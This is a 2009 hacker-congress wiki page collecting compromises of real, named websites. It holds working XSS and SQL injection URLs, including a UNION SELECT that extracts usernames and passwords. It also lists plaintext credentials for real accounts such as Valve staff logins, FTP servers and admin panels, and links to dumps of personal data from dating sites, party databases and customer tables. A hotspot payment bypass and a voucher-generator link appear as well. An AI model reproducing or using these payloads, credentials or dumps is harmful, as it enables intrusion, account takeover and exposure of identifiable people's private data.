From 26C3 Public Wiki
Hacked
Contents |
Login
anonymous2/2342
Anonymous/anonymous3
Foodhacks
- As last year I present you the Burger-King Voucher-Generator:
http://zzzbk.zz.funpic.de/bk/bk.php
(If you would like to thank me/talk to me, just contact mathias_ on #26c3@freenode - maybe bring me that second big king xxl you left over or a bottle of mate/beer? ;)
- I'd get you a beer if you give us the source... --Bugmenot 21:12, 27 December 2009 (CET))
You can generate your own vouchers on Burger-king.de, but you can only get 4 on a DinA4-pages, and even worse: you cant select all vouchers that are on their servers. Also you need to register on their site. All of the vouchers used to work (they changed the format of the vouchers, and some are really a good deal (mid-sized fries for 50 Cent i.e.).
Store them on your smartphone, ebook reader, scrap paper, skin, ....
You can also print them out, of course, but where's the fun in that? Please don't ask the Ministry of Information if you don't have a printer.
- The "Asia Gourmet" Shop in the Station Alexanderplatz is giving 50c Discount on everything >5€, if you show your congress badge.
@ The CON
Rickroll Armee Fraktion - Dan Kaminsky trolling
Free Downloads
Harzflirt.de
- full list at http://pbot.rmdir.de/0c7cee461730d0c5c13d8a750e7c1d16
- Index of http://harzflirt.de/fotos @ ftp://81.163.16.183/incoming/harzflirt_index.html (32mb)
- Torrent: [1]
- additional download (6000 new profile-photos) http://rapidshare.de/files/48917127/additional_images.tar.html
flirt-datings.de
unaone Hoster
- user: 23317-24641b-ftp
- pass: retep
- host: ftp.unaone.net
Nazi-KFZ-Kennzeichen, anyone?
http://picpaste.de/photo_1230999651.jpg (FIXED)
NPD Fraktion Sachsen
forum.deutsche-armee.com
Blöd, wenn Leute in der Flirt-Börse den gleichen Mail-Account verwenden wie für die Organisation ihrer politischen Aktivitäten UND DAS GLEICHE PASSWORD noch dazu!
Ich hätte hier eine nette Nazi-Seite anzubieten. Könnte bitte jemand einen Torrent draus machen? Tausend Dank!
phpbb mysql-dump: 1. http://rapidshare.com/files/328310266/backup_1262192175_23b69906890bfe3d.sql.gz.html
Den Blog hätt ich auch noch: 2. http://rapidshare.com/files/328309942/wordpress.2009-12-30.xml.tar.gz.html
XSS
Please do not poste too much lame XSS. Real hacks desired!
- http://www.mudam.lu/index.php?recherche=%22%3E%3Cimg%20src=http://events.ccc.de/wp-content/uploads/2009/12/26c3_schlange_xs.jpg%3E%3Ca%20href=%22#
- http://www.aar.ch/search.php?q=%3Ciframe+src%3D%22http%3A%2F%2Fevents.ccc.de%2Fcongress%2F2009%2Fwiki%2Fskins%2Fherebedragons%2Fimg%2F26C3_topbar.jpg%22+style%3D%22border%3A0px+%23FFFFFF+none%3B%22+name%3D%22meinIFrame%22+scrolling%3D%22auto%22+frameborder%3D%221%22+align%3Daus+marginheight%3D%220px%22+marginwidth%3D%220px%22+height%3D%22480%22+width%3D%22640%22%3E%3C%2Fiframe%3E
- http://www.tango.lu/index.php/search/doSearch
Input: "><script>alert("26C3 FTW!")</script><script
Input: '><script>alert("26C3 FTW!")</script>
- http://www.serienfans.tv/episoden.php?serie=%29%3C/style%3E%3Cscript%3Ealert%28String.fromCharCode%2868,78,88,32,119,97,115,32,104,101,114,101%29%29%3C/script%3E%3C
- http://www.gls-group.eu/276-I-PORTAL-WEB/content/GLS/DE03/DE/5001.htm?txtQuery=%3C%2Fstrong%3E%3Cimg+src%3D%22http://events.ccc.de/congress/2009/wiki/skins/herebedragons/img/26C3_topbar.jpg%22%2F%3E%3Cstrong%3E
- https://partner.steamgames.com/index.php?msg=%27%3E%3Cscript%3Ealert%28%2226C3%20FTW!%22%29%3C/script%3E
- http://www.samepoint.com/news.php?q=%3Cimg+src%3Dhttp%3A%2F%2Fupload.wikimedia.org%2Fwikipedia%2Fde%2Fthumb%2Fd%2Fd1%2FLogo_CCC.svg%2F800px-Logo_CCC.svg.png%3E&searchb=+search+social+media+
- http://www.titus.de/screen.phtml?screen=ne_home&screen=ne_home&fid[]=173&Page=%22%3E%3Cscript%3Ealert%28%27DNX%20was%20here%27%29%3C/script%3E
- sat1 http://www.sat1.de/tvprogramm_community/tvprogramm/?action=on%3Cimg%20src=http://static.gulli.com/media/2009/12/26C3-dragon-baby.jpg%3E
- http://de.oleo.tv/suche/?query=%3Cimg%20src=http://events.ccc.de/congress/2009/wiki/skins/herebedragons/img/26C3_topbar.jpg%20width=%22600%22%20height=%22150%22%3E/ (already fixed)
- http://pbfcomics.com/?cid=%22%20height=0%20width=0%20%20/%3E%3Cimg%20src=%22http://events.ccc.de/congress/2009/wiki/skins/herebedragons/img/26C3_topbar.jpg%22%20/%3E%3Cimg%20width=0%20height=0%20%20src=%22
- http://pastasquares.gathers.de/pictures.php?action=year&year=%3Cimg%20src=%22http://events.ccc.de/congress/2009/wiki/skins/herebedragons/img/26C3_topbar.jpg%22%20/%3EHey%20Bernd,%20liebe%20gruesse%20dein%20Kraut%20Hahn!
spread the word
- Mindwerk Seiten:
- http://afhakers.nl/
- http://www.dragontown.bloodymary-bsw.de/
- http://www.herner-karneval.de/
- http://promoaoa.pr.funpic.de/
- http://www.alba.ac-m-design.de/php/
- http://thebrotherhood.th.funpic.de/
- http://formel1.villa-schlumpf.de/php/
- true 26c3mediawiki layout
- http://www.the-paladins.de/
- http://www.steelers.de/aktuelles/news_anzeigen.php?news_id=1688
- die admins sind schnell :(
- http://www.9korn.com/
- http://www.ma-flirt.de Auch Nazis brauchen Liebe!
- CSU Rosenheim Upppppss : Screenshot: http://picpaste.de/CSU-Rosenheim-capture.jpg
- Wifimaps Login to edit PHP code or use the Bash (may have to load twice) or look at the DB (wifimaps/7f6232fj9)
- Have anyone an Dump of the (PHP) Files?
- http://www.fdp-hille.org/ einmal mit profis
- www.berlin-klavierunterricht.com
- http://www.grundschule-cainsdorf.de/
- http://www.svp-stadt-zuerich.ch/ Screenshot: http://yfrog.com/j5svpp
- DaPhix Prepay-Internet-Hotspot (no encryption!) @ http://www.generatorhostels.com/en/berlin -> use static IP 192.168.11.x / dns&gateway 192.168.11.1 and get Internet 4free -> Screenshot Admin Interface (no pw): http://yfrog.com/6eadminpreisep / http://yfrog.com/5zbildschirmfotoep
Targets
See Hacked/Targets
Insecure Passwords
- No password at a SMTP server at airport Tegel: 10.5.40.140:25
- DHL Austria Self-service Username/Password: dhl (Presented to you by "just this guy, you know")
- Bayernbund e.V. Admin:123456
- TSV 1860 Rosenheim Admin:123456
- Junge Union Rosenheim Land Admin:123456 thanks google
- Theater Rosenheim e.V admin/123456 thx to http://www.mdwd.org/index.php?section=ref
- Admin/123456 most pages from http://www.mdwd.org/index.php?section=ref via index.php?section=admin
- Support.Steampowered.com Username: erics / EricS - Password: connie (erics@valvesoftware.com) and Username: miked - Password: rosemary (miked@valvesoftware.com)
- community.steampowered.com Username: michaeld@valvesoftware.com - Password: rosemary
- Kuhne+Nagel Logistics Access a PHP based file manager and host your own project on a Windows based web server! Password: axadmin (according to html source, the system is by some company called AutomationX -> first and last letter of company name + "admin" does it ;-) The Website itself is at [2]
File Inclusions
- Strato Communicator File Inclusion found1 (FIXED)
- System-Failures.org Failure at its best. /etc/passwd Screenshot
SQL Injections
- SVP STADT ZUERICH databasedump anyone? 13 columns afair.
- MVV München _FULL SQL QUERY DISCLOSURE_ ... have fun
- NPD Fraktion Sachsen (MIRRORS?)
- Here you have a dump (csv) npd_dump.zip 1
- cdu-reinickendorf.de Have fun!
- User: v089141@85.13.128.149
- DB: v089141
- DB Version: 4.0.23-Max-log
- Turbine-Potsdam
- treff.bundeswehr.de
- rds_user
- id
- levelnr
- login
- password
- name
- vorname
- email_flag
- telefon
- abteilung
- info
- ip
- accesstime
- lastlogin
- active
- startPage
- rds_user
- Also a Local File Inclusion within a Bundeswehr page
- Any further information?
- Database dump in progress :-) Using sqlmap?
- steelers.de
- utopolis.lu (User passwords in cleartext (not even hashed), full addresses, cellphone and telephone numbers, etc...)
- dump?
- npd-niederbayern.de
- no user/pw data accessible
- interessting: newsletter database http://de.pastebin.ca/1728696 - hashes: http://de.pastebin.ca/1728870
- Tabellen:
- newsletter
- epost
- austragen
- nachrichten
- id
- datum
- art
- kreisverband
- ueberschrift
- text
- bild_vorschau
- bild_detail
- newsletter
- npd-fraktion-sachsen.de
- DB User: web2@localhost
- DB name: usr_web2_1
- 9 columns:[http://npd-fraktion-sachsen.de/index.php?verweis=3,4,1&drucksache=reden&drucksacheid=d'+or+=+group+by+9+%23
- WAF - writes "Fehler". Matches: "union", "select", [etc?]
- pandatechnik.de (Panda AV shit)
- Wölfe Freiburg
- DB User: ehcuser@localhost
- DB: ehc_db1
- ["http://www.arsenalzadar.com/eng/trgovine/trgovina.php?id=1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14--"]
- DB User: arsenal1_arsenal@localhost
- DB: arsenal1_arsenal
- DB Version: 5.0.85-community-log
- http://mega-stream.us/?DownAction=Stream&id=0%20uNion%20seLect%201,2,3,concat%28id,0x20,username,0x20,password,0x20,rechte%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20users%20limit%200,1/*powered_by_DNX*/
- user: http://de.pastebin.ca/1729476
- some pws: freshboy/werter and Lazboy6161/tomate
- fatal error @ login http://mega-stream.us/login.php
- some pws: freshboy/werter and Lazboy6161/tomate
- db-structure: http://de.pastebin.ca/1729479
- user: http://de.pastebin.ca/1729476
- http://www.regierung.oberpfalz.bayern.de/xsuche/regopf/search2.php?q=bayern&ue=%27&ue=&ul=&m=all&wm=wrd&ps=10
- deleted...
- http://www.ivd-online.de/DB/Form_End.htm
